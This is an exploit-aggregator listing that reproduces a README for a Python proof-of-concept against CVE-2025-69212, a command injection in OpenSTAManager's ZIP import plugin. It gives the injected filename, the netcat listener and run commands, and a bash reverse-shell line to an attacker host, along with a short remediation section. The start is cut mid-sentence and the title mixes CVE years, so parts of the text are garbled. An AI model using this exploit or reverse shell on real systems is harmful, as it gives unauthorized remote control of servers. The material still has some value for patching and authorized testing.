Exploit for CVE-2026-69212 CVE-2025-69212 CVE-2026-69212

Name: Exploit for CVE-2026-69212 CVE-2025-69212 CVE-2026-69212
Rating: 5 (3 reviews)
2026-06-28 | CVSS 9.4
## https://sploitus.com/exploit?id=BF7DCB0D-BCFB-51E5-B8DF-4705A1E07674
# CVE-2025-69212 — OpenSTAManager OS Command Injection (RCE)

Proof-of-concept exploit for **CVE-2025-69212**, an OS Command Injection vulnerability in OpenSTAManager ;echo ".p7m
```

**Resulting shell execution:**
```bash
openssl smime ... -in "invoice.p7m";;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ injected here
```

> **Note:** The forward slash `/` cannot appear directly in the filename because `ZipArchive::extractTo()` treats it as a path separator. The PoC avoids this by base64-encoding the reverse shell payload.

---

## Requirements

- Python 3.x
- `requests` library
- Valid OpenSTAManager credentials (any role with access to the import plugin)
- A listener on the attacker machine (e.g. `nc`)

Install dependencies:
```bash
pip install requests
```

---

## Usage

```bash
python3 CVE-2025-69212.py -u  -U  -P  --lhost  --lport 
```

### Options

| Argument | Required | Description |
|---|---|---|
| `-u`, `--url` | Yes | Target base URL (e.g. `http://target.htb`) |
| `-U`, `--username` | Yes | OpenSTAManager username |
| `-P`, `--password` | Yes | OpenSTAManager password |
| `--lhost` | Yes | Your IP address for the reverse shell |
| `--lport` | Yes | Your listening port for the reverse shell |
| `--proxy` | No | HTTP proxy (e.g. `http://127.0.0.1:8080`) |

### Example

```bash
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# Route through Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080
```

---

## How It Works

1. **Authentication** — Logs into OpenSTAManager using provided credentials
2. **Payload building** — Constructs a ZIP archive containing a `.p7m` file whose filename includes the injected command
3. **Base64 encoding** — The reverse shell (`bash -i >& /dev/tcp/LHOST/LPORT 0>&1`) is base64-encoded to avoid forward slashes in the filename
4. **Upload** — POSTs the ZIP to `/actions.php` via the `importFE_ZIP` plugin
5. **Execution** — The server extracts the ZIP, passes the malicious filename to `exec()`, triggering the reverse shell
6. **Threading** — The upload runs in a daemon thread since bash holds the HTTP connection open; the script exits cleanly without waiting for a response

---

## Remediation

Update to OpenSTAManager **2.9.9 or later**, which sanitizes filenames before passing them to shell commands.

If patching immediately is not possible, disable the `importFE_ZIP` plugin or restrict access to `/actions.php` to trusted users only.

---

## Disclaimer

This tool is intended for **authorized security testing and educational purposes only**. Use only on systems you own or have explicit written permission to test. Unauthorized use against systems you do not own is illegal and unethical. The author is not responsible for any misuse or damage caused by this tool.

---

## References

- [GHSA-25fp-8w8p-mx36](https://github.com/advisories/GHSA-25fp-8w8p-mx36)
- [OpenSTAManager GitHub](https://github.com/devcode-it/openstamanager)
- [NVD - CVE-2025-69212](https://nvd.nist.gov/vuln/detail/CVE-2025-69212)